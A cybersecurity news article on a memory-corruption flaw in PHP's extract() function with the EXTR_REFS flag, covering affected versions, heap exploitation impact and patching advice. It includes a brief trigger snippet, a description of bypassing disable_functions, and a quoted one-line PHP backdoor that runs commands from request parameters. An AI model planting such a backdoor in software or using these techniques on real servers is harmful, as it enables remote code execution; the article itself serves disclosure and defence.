Wednesday, May 7, 2025
HomeCVE/vulnerabilityCritical Flaw in PHP’s extract() Function Enables Arbitrary Code Execution

Critical Flaw in PHP’s extract() Function Enables Arbitrary Code Execution

Published on

SIEM as a Service

Follow Us on Google News

A critical vulnerability in PHP’s extract() function has been uncovered, enabling attackers to execute arbitrary code by exploiting memory corruption flaws.

The issue affects PHP versions 5.x, 7.x, and 8.x, allowing malicious actors to trigger double-free (PHP 5.x) or use-after-free (PHP 7.x/8.x) conditions, ultimately leading to remote code execution (RCE).

Technical Breakdown

According to the SSD report, the flaw stems from improper handling of the EXTR_REFS flag in extract(), which imports variables into the symbol table as references.

- Advertisement - Google News

When overwriting existing variables, the function calls zval_ptr_dtor to destroy the original value. If the original variable is an object, its __destruct method is invoked mid-destruction, enabling attackers to manipulate the heap via crafted input:

// Example triggering the vulnerability

$malicious_array = ['var' => new ExploitableClass()];

extract($malicious_array, EXTR_REFS);

During this process, PHP’s internal zval_ptr_dtor function frees memory multiple times if an object’s destructor unsets the same variable, corrupting the heap.

In PHP 5.x, this causes a double-free, while newer versions suffer from use-after-free due to changes in memory management.

FieldDetails
VulnerabilityCritical flaw in PHP’s extract() function allows arbitrary code execution
Affected VersionsPHP 5.x (double-free), PHP 7.x & 8.x (use-after-free)
Root CauseImproper memory management when using extract() with EXTR_REFS flag, especially during object destruction
Trigger ConditionAn object’s __destruct method unsets a variable during an ongoing zval_ptr_dtor call in extract()
Vulnerability TypeDouble-free (PHP 5.x), Use-after-free (PHP 7.x, 8.x)
ImpactHeap corruption, arbitrary read/write, and remote/native code execution

Exploitation Impact

Attackers can leverage this to:

  1. Overwrite critical memory structures (e.g., PHP’s HashTable or zval objects).
  2. Execute arbitrary native code by manipulating heap allocations to gain read/write primitives.
  3. Bypass security mechanisms like disable_functions by hijacking PHP’s internal function handlers.

Proof-of-concept exploits demonstrate how to chain these primitives to achieve RCE. For instance, overwriting the handler of a disabled function like system() with a legitimate address restores its execution capability1.

The PHP team has patched the issue in GitHub Advisory GHSA-4pwq-3fv3-gm94. Administrators should:

  1. Update PHP to the latest version immediately.
  2. Audit code for unsafe extract() usage, especially with user-controlled data (e.g., extract($_POST)).
  3. Replace extract() with explicit variable assignments or use flags like EXTR_PREFIX_ALL to isolate variables.

This vulnerability underscores long-standing risks in PHP’s extract(), which has been flagged for decades as prone to misuse. Past incidents include backdoors like:

@extract($_REQUEST);

@die($ctime($atime)); // Allows $_REQUEST['ctime']('command') execution [4]

Developers are urged to avoid extracting () entirely for user input and adopt secure coding practices.

The extract() vulnerability highlights the dangers of legacy functions in modern ecosystems.

While patches are available, proactive code reviews and dependency updates remain critical to mitigating such risks.

Organizations using PHP should prioritize upgrading and eliminating unsafe patterns to prevent exploitation.

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector...

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its...

SpyCloud Analysis Reveals 94% of Fortune 50 Companies Have Employee Data Exposed in Phishing Attacks

SpyCloud, the leading identity threat protection company, today released an analysis of nearly 6...

PoC Tool Released to Detect Servers Affected by Critical Apache Parquet Vulnerability

F5 Labs has released a new proof-of-concept (PoC) tool designed to help organizations detect...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector...

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its...

PoC Tool Released to Detect Servers Affected by Critical Apache Parquet Vulnerability

F5 Labs has released a new proof-of-concept (PoC) tool designed to help organizations detect...